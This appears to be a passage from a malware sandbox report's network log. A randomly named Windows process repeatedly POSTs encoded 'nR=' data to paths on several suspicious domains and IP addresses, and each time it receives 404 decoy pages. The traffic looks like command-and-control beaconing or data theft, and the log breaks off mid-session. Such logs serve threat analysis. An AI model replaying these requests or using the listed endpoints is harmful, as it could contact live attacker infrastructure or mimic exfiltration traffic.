                    Sep 12, 2024 13:04:13.034251928 CEST | 753 | OUT | POST /wjff/ HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en
                    Host: www.qiluqiyuan.buzz
                    Origin: http://www.qiluqiyuan.buzz
                    Referer: http://www.qiluqiyuan.buzz/wjff/
                    Content-Type: application/x-www-form-urlencoded
                    Connection: close
                    Content-Length: 223
                    Cache-Control: max-age=0
                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                    Data Ascii: nR=1I9qNX7VLGDrQtyf/aEaLcHN8NN+Sreykoym4LoNczlNGVm0DcLt0xG8tvNVOzbaAxs7lwbMgFmYCSv9uuZAEOYCGqt9IewV03C0xQSxPDl1zODpwpi4WN1gzIBRXo6Mj8TOns/OAXvjBTLywwbHJPwxCJ9XX9VtfmtqCwnjvUmitkgKhx38GVgGzRRlM8cD2LDW3Jk2Sw70Iv2gq0LZdalyjYU/
                    Sep 12, 2024 13:04:14.479947090 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                    Server: nginx
                    Date: Thu, 12 Sep 2024 11:04:13 GMT
                    Content-Type: text/html; charset=utf-8
                    Transfer-Encoding: chunked
                    Connection: close
                    Vary: Accept-Encoding
                    ETag: W/"66cd104a-b96"
                    Content-Encoding: gzip
                    Sep 12, 2024 13:04:14.480197906 CEST | 370 | IN |
                    Sep 12, 2024 13:04:14.480438948 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                    Server: nginx
                    Date: Thu, 12 Sep 2024 11:04:13 GMT
                    Content-Type: text/html; charset=utf-8
                    Transfer-Encoding: chunked
                    Connection: close
                    Vary: Accept-Encoding
                    ETag: W/"66cd104a-b96"
                    Content-Encoding: gzip
                    Sep 12, 2024 13:04:14.481065989 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                    Server: nginx
                    Date: Thu, 12 Sep 2024 11:04:13 GMT
                    Content-Type: text/html; charset=utf-8
                    Transfer-Encoding: chunked
                    Connection: close
                    Vary: Accept-Encoding
                    ETag: W/"66cd104a-b96"
                    Content-Encoding: gzip


                    Session ID: 23 | Source IP: 192.168.2.5 | Source Port: 49736 | Destination IP: 161.97.168.245 | Destination Port: 80 | PID: 4444 | Process: C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 12, 2024 13:04:15.577953100 CEST | 1770 | OUT | POST /wjff/ HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en
                    Host: www.qiluqiyuan.buzz
                    Origin: http://www.qiluqiyuan.buzz
                    Referer: http://www.qiluqiyuan.buzz/wjff/
                    Content-Type: application/x-www-form-urlencoded
                    Connection: close
                    Content-Length: 1239
                    Cache-Control: max-age=0
                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                    Data Ascii: nR=[TRUNCATED]
                    Sep 12, 2024 13:04:16.180771112 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                    Server: nginx
                    Date: Thu, 12 Sep 2024 11:04:16 GMT
                    Content-Type: text/html; charset=utf-8
                    Transfer-Encoding: chunked
                    Connection: close
                    Vary: Accept-Encoding
                    ETag: W/"66cd104a-b96"
                    Content-Encoding: gzip
                    Sep 12, 2024 13:04:16.180789948 CEST | 370 | IN |


                    Session ID: 24 | Source IP: 192.168.2.5 | Source Port: 49737 | Destination IP: 161.97.168.245 | Destination Port: 80 | PID: 4444 | Process: C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 12, 2024 13:04:18.122958899 CEST | 462 | OUT | GET /wjff/?nR=4KVKOjLTUXvpTd2u/bZ1Xtjp48VIQpKAiZnao6g9chZjOHWeMu7z3zqylslmOgP9LXsxnQP9kQW6V1nPysVCefcRDYtQJbJyj2mk5xrQKh9CjNT1kJiwas5jw5tGEdzT0Q==&OJ=btRp HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                    Accept-Language: en-US,en
                    Host: www.qiluqiyuan.buzz
                    Connection: close
                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                    Sep 12, 2024 13:04:18.731256008 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                    Server: nginx
                    Date: Thu, 12 Sep 2024 11:04:18 GMT
                    Content-Type: text/html; charset=utf-8
                    Content-Length: 2966
                    Connection: close
                    Vary: Accept-Encoding
                    ETag: "66cd104a-b96"
                    Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;color: #5d5d5d;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial,"Noto Sans", sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol","Noto Color Emoji";text-shadow: 0px 1px 1px rgba(255, 255, 255, 0.75);text-align: center;}h1 {font-size: 2.45em;font-weight: 700;color: #5d5d5d;letter-spacing: -0.02em;margin-bottom: 30px;margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fadeIn;}.info {color: #5594cf;fill: #5594cf;}.error [TRUNCATED]
                    Sep 12, 2024 13:04:18.731272936 CEST | 1236 | IN |
                    Data Ascii: ;fill: #c92127;}.warning {color: #ffcc33;fill: #ffcc33;}.success {color: #5aba47;fill: #5aba47;}.icon-large {height: 132px;width: 132px;}.description-text {color: #707
                    Sep 12, 2024 13:04:18.731286049 CEST | 698 | IN |
                    Data Ascii: 941 216 296v4c0 6.627 5.373 12 12 12h56c6.627 0 12-5.373 12-12v-1.333c0-28.462 83.186-29.647 83.186-106.667 0-58.002-60.165-102-116.531-102zM256 338c-25.365 0-46 20.635-46 46 0 25.364 20.635 46 46 46s46-20.636 46-46c0-25.365-20.635-46-46-46z"


                    Session ID: 25 | Source IP: 192.168.2.5 | Source Port: 49738 | Destination IP: 172.96.191.39 | Destination Port: 80 | PID: 4444 | Process: C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 12, 2024 13:04:24.039851904 CEST | 730 | OUT | POST /3lkx/ HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en
                    Host: www.bola88site.one
                    Origin: http://www.bola88site.one
                    Referer: http://www.bola88site.one/3lkx/
                    Content-Type: application/x-www-form-urlencoded
                    Connection: close
                    Content-Length: 203
                    Cache-Control: max-age=0
                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                    Data Ascii: nR=cgJ0RJsNAcCJKd9GcYaNwPMnm0blJssizLZI7EQU+y2qsAmGGU0oGG+REshQzo4ufG/sMYK/HcVSoglBsG9tIE3Lwqa/X635y2kg8+AQVTT8iT+O/sws3344yDxxpBgafbBfOO++2LYxG+msl6qQ6IDrfKkN3lIZMv8LKaHfHIqhm7+IxmeYc1MQbS+x0a+fQ40yOps=
                    Sep 12, 2024 13:04:24.947698116 CEST | 1033 | IN | HTTP/1.1 404 Not Found
                    Connection: close
                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                    pragma: no-cache
                    content-type: text/html
                    content-length: 796
                    date: Thu, 12 Sep 2024 11:04:24 GMT
                    server: LiteSpeed
                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    26 | 192.168.2.5 | 49739 | 172.96.191.39 | 80 | 4444 | C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 12, 2024 13:04:26.696578979 CEST | 750 | OUT | POST /3lkx/ HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en
                    Host: www.bola88site.one
                    Origin: http://www.bola88site.one
                    Referer: http://www.bola88site.one/3lkx/
                    Content-Type: application/x-www-form-urlencoded
                    Connection: close
                    Content-Length: 223
                    Cache-Control: max-age=0
                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                    Data Raw: 6e 52 3d 63 67 4a 30 52 4a 73 4e 41 63 43 4a 46 5a 42 47 66 2f 75 4e 34 50 4d 6d 71 55 62 6c 47 4d 73 6d 7a 4c 56 49 37 42 77 45 2b 41 43 71 74 69 2b 47 55 6d 63 6f 54 47 2b 52 50 4d 68 66 74 59 34 6c 66 47 79 4d 4d 5a 32 2f 48 63 52 53 6f 69 74 42 76 31 6c 73 49 55 33 56 38 4b 61 35 59 61 33 35 79 32 6b 67 38 2b 6b 75 56 58 2f 38 6a 69 75 4f 2b 4e 77 76 70 6e 34 37 37 6a 78 78 74 42 67 65 66 62 42 70 4f 4b 32 59 32 49 77 78 47 36 69 73 6c 72 71 66 30 49 44 70 42 36 6b 44 6e 6c 74 46 56 4a 6f 31 4f 5a 71 75 57 5a 48 46 71 74 54 69 72 45 57 77 50 56 67 6f 4c 42 32 47 6c 71 66 32 4b 62 6b 43 51 2b 34 4c 32 65 50 71 70 47 50 77 2f 64 32 59 66 6e 36 78 48 4c 58 77
                    Data Ascii: nR=cgJ0RJsNAcCJFZBGf/uN4PMmqUblGMsmzLVI7BwE+ACqti+GUmcoTG+RPMhftY4lfGyMMZ2/HcRSoitBv1lsIU3V8Ka5Ya35y2kg8+kuVX/8jiuO+Nwvpn477jxxtBgefbBpOK2Y2IwxG6islrqf0IDpB6kDnltFVJo1OZquWZHFqtTirEWwPVgoLB2Glqf2KbkCQ+4L2ePqpGPw/d2Yfn6xHLXw
                    Sep 12, 2024 13:04:27.810235023 CEST | 1033 | IN | HTTP/1.1 404 Not Found
                    Connection: close
                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                    pragma: no-cache
                    content-type: text/html
                    content-length: 796
                    date: Thu, 12 Sep 2024 11:04:27 GMT
                    server: LiteSpeed
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    27 | 192.168.2.5 | 49740 | 172.96.191.39 | 80 | 4444 | C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 12, 2024 13:04:29.234381914 CEST | 1767 | OUT | POST /3lkx/ HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en
                    Host: www.bola88site.one
                    Origin: http://www.bola88site.one
                    Referer: http://www.bola88site.one/3lkx/
                    Content-Type: application/x-www-form-urlencoded
                    Connection: close
                    Content-Length: 1239
                    Cache-Control: max-age=0
                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                    Data Raw: 6e 52 3d 63 67 4a 30 52 4a 73 4e 41 63 43 4a 46 5a 42 47 66 2f 75 4e 34 50 4d 6d 71 55 62 6c 47 4d 73 6d 7a 4c 56 49 37 42 77 45 2b 41 36 71 73 52 32 47 47 78 41 6f 42 32 2b 52 43 73 68 63 74 59 34 6b 66 47 71 41 4d 5a 36 46 48 66 35 53 71 48 35 42 75 41 4a 73 44 55 33 56 30 71 61 38 58 36 32 6a 79 32 30 6b 38 2b 30 75 56 58 2f 38 6a 68 6d 4f 6f 73 77 76 72 6e 34 34 79 44 78 31 70 42 67 36 66 64 70 35 4f 4b 79 75 33 34 51 78 42 65 47 73 6e 5a 79 66 38 49 44 76 41 36 6c 46 6e 6c 52 73 56 4e 4a 47 4f 5a 75 49 57 61 6e 46 70 6f 32 43 79 55 58 6d 61 57 30 79 4a 67 43 38 6e 74 44 56 4d 34 34 36 56 35 70 78 36 62 33 66 75 69 75 38 33 4e 6e 57 4a 79 6d 6b 56 75 4f 6f 6d 47 51 67 31 31 30 4a 4c 59 38 4d 41 33 4b 77 4d 54 65 56 6e 71 6b 4f 35 72 59 66 30 42 64 41 67 74 57 4d 6e 66 59 49 6c 57 6f 6b 4a 6d 62 74 4f 33 67 79 58 79 64 67 43 72 7a 2b 31 72 46 39 45 77 76 47 6c 45 57 64 70 44 36 58 65 65 66 42 38 41 72 77 30 2f 6c 55 57 4a 44 73 79 63 58 63 45 31 4e 6e 71 4f 64 59 71 43 42 36 42 53 43 66 30 55 75 [TRUNCATED]
                    Data Ascii: nR= [TRUNCATED]
                    Sep 12, 2024 13:04:30.122452974 CEST | 1033 | IN | HTTP/1.1 404 Not Found
                    Connection: close
                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                    pragma: no-cache
                    content-type: text/html
                    content-length: 796
                    date: Thu, 12 Sep 2024 11:04:29 GMT
                    server: LiteSpeed
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    28 | 192.168.2.5 | 49741 | 172.96.191.39 | 80 | 4444 | C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 12, 2024 13:04:31.784569979 CEST | 461 | OUT | GET /3lkx/?nR=RihUS+ZcBcWtP49fbKLPl8hUiWX9OeM0xYk2jkkE+x6ehgmefEg3XF27GOoD6ZAnAm79O7OuHoRKwHtCqV4uYWL7+sOZXKma82UzwNxpRmep+gGd7K5Ptmsj9EAWiB5wAw==&OJ=btRp HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                    Accept-Language: en-US,en
                    Host: www.bola88site.one
                    Connection: close
                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                    Sep 12, 2024 13:04:32.719666004 CEST | 1033 | IN | HTTP/1.1 404 Not Found
                    Connection: close
                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                    pragma: no-cache
                    content-type: text/html
                    content-length: 796
                    date: Thu, 12 Sep 2024 11:04:32 GMT
                    server: LiteSpeed
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    29 | 192.168.2.5 | 49742 | 104.21.20.125 | 80 | 4444 | C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 12, 2024 13:04:37.786297083 CEST | 724 | OUT | POST /h5qr/ HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en
                    Host: www.kckartal.xyz
                    Origin: http://www.kckartal.xyz
                    Referer: http://www.kckartal.xyz/h5qr/
                    Content-Type: application/x-www-form-urlencoded
                    Connection: close
                    Content-Length: 203
                    Cache-Control: max-age=0
                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                    Data Raw: 6e 52 3d 79 5a 4f 39 61 42 37 34 57 33 41 33 75 65 5a 65 68 70 55 53 32 50 72 75 39 32 37 71 71 62 66 55 46 4e 69 6e 32 50 4e 4e 6d 71 39 54 31 4c 49 71 49 61 78 77 70 6f 4b 53 63 56 66 77 41 4f 75 69 4e 63 30 53 45 61 64 72 38 46 4e 6c 32 6e 4a 52 63 63 32 30 6f 4a 41 33 35 72 71 67 52 36 69 4c 67 7a 37 58 62 39 79 72 66 34 49 2b 49 53 78 33 42 2b 43 4b 69 6a 31 6c 58 61 79 6f 4d 63 6c 73 6e 34 41 36 4f 51 73 74 53 35 70 4d 65 77 77 56 47 59 70 46 4c 4d 66 2b 47 4a 72 49 43 43 66 30 74 35 48 6e 68 63 79 4c 41 5a 74 50 45 75 50 4d 62 59 35 45 42 31 55 64 70 6a 55 6f 6a 6e 39 52 75 65 2b 68 4c 6f 51 3d
                    Data Ascii: nR=yZO9aB74W3A3ueZehpUS2Pru927qqbfUFNin2PNNmq9T1LIqIaxwpoKScVfwAOuiNc0SEadr8FNl2nJRcc20oJA35rqgR6iLgz7Xb9yrf4I+ISx3B+CKij1lXayoMclsn4A6OQstS5pMewwVGYpFLMf+GJrICCf0t5HnhcyLAZtPEuPMbY5EB1UdpjUojn9Rue+hLoQ=
                    Sep 12, 2024 13:04:38.374731064 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                    Date: Thu, 12 Sep 2024 11:04:38 GMT
                    Content-Type: text/html
                    Transfer-Encoding: chunked
                    Connection: close
                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                    pragma: no-cache
                    vary: User-Agent
                    x-turbo-charged-by: LiteSpeed
                    cf-cache-status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cu4AuzxpRL2wTxYxs46mljvEueJbNkia0oL3qB9VHt%2B9jKlnl8dLMzG%2BM9O03TcFosbptdMI946VO21SgBfzzN%2BiwuguYKXPamtmNE8yUOrnDlpYVsjbJzNCwqnab%2Fk9qhE4"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8c1f6af69f017c88-EWR
                    Content-Encoding: gzip
                    alt-svc: h3=":443"; ma=86400
                    Data Raw: 32 63 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 64 54 ed 8a db 3a 10 fd 1f e8 3b cc 7a 29 74 21 de c8 59 87 16 db 31 2d fd a0 17 4a ef 42 17 2e fd 29 5b e3 68 58 59 72 a5 89 93 b4 f4 dd 2f 72 92 fd 68 35 20 4b e3 33 a3 99 33 23 55 17 1f fe 7d 7f f7 fd f6 23 68 ee 4d 3d ab e2 07 02 1f 0c ae 13 8d b4 d1 5c 64 42 bc 4c e2 2f 94 aa 9e 55 3d b2 04 2b 7b 5c 27 23 e1 6e 70 9e 13 68 9d 65 b4 bc 4e 76 a4 58 af 15 8e d4 62 3a 6d e6 40 96 98 a4 49 43 2b 0d ae b3 39 04 ed c9 de a7 ec d2 8e 78 6d 5d 02 8b 7a 56 31 b1 c1 1a 72 91 c3 57 c7 f0 c9 6d ad 7a 31 ab 16 47 7d 35 05 55 bf ed 51 91 84 57 83 c7 0e 7d 48 5b 67 9c 4f 43 ab b1 c7 42 49 7f 7f f5 ab 71 ea f0 ab 91 ed fd c6 47 17 47 48 71 29 84 b8 a0 3e 86 2b 2d ff fe 5d 2d 8e 0e ab c5 29 af 68 76 ce fc 68 02 97 79 9e 97 d0 4b bf 21 5b 88 b2 73 96 0b b0 ce f7 d2 40 96 0f fb c5 52 0c 7b 78 e7 49 9a 39 7c 46 33 22 53 2b e7 10 a4 0d 69 40 4f 5d 09 4f 48 2c e1 af a8 e0 b2 eb ba 32 b2 ab 68 fc 83 77 b9 65 57 42 4f 36 7d e6 23 a9 21 8e a7 06 8c 7b 4e a5 a1 8d 2d a0 45 cb [TRUNCATED]
                    Data Ascii: 2cddT:;z)t!Y1-JB.)[hXYr/rh5 K33#U}#hM=\dBL/U=+{\'#npheNvXb:m@IC+9xm]zV1rWmz1G}5UQW}H[gOCBIqGGHq)>+-]-)hvhyK![s@R{xI9|F3"S+i@O]OH,2hweWBO6}#!{N-EK/1);. brMpfXx]168Jg8HJ'jrkCGU3L\Bg1Hln>^j4[Z5chhk/P>O(=5M'<r9SS
                    Sep 12, 2024 13:04:38.374779940 CEST | 238 | IN | Data Raw: a9 14 d9 4d 11 5b 21 86 09 e7 45 f9 40 b0 47 23 99 46 2c 5b 83 d2 17 8d 63 5d 3e d6 f4 c1 df 94 79 9a 89 6c d8 97 7f f7 6f fe 3a 4a d9 38 af d0 4f 50 c8 86 3d 04 67 48 81 df 34 f2 95 98 4f 72 9d ad ae ca c6 ed d3 a0 a5 72 bb 02 c4 04 14 47 d0 72
                    Data Ascii: M[!E@G#F,[c]>ylo:J8OP=gH4OrrGr$ol@w[e0zT1~|jXK~V[g0?SI$@AH meN/wYOb<3^x?be0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    30 | 192.168.2.5 | 49743 | 104.21.20.125 | 80 | 4444 | C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 12, 2024 13:04:40.330420017 CEST | 744 | OUT | POST /h5qr/ HTTP/1.1
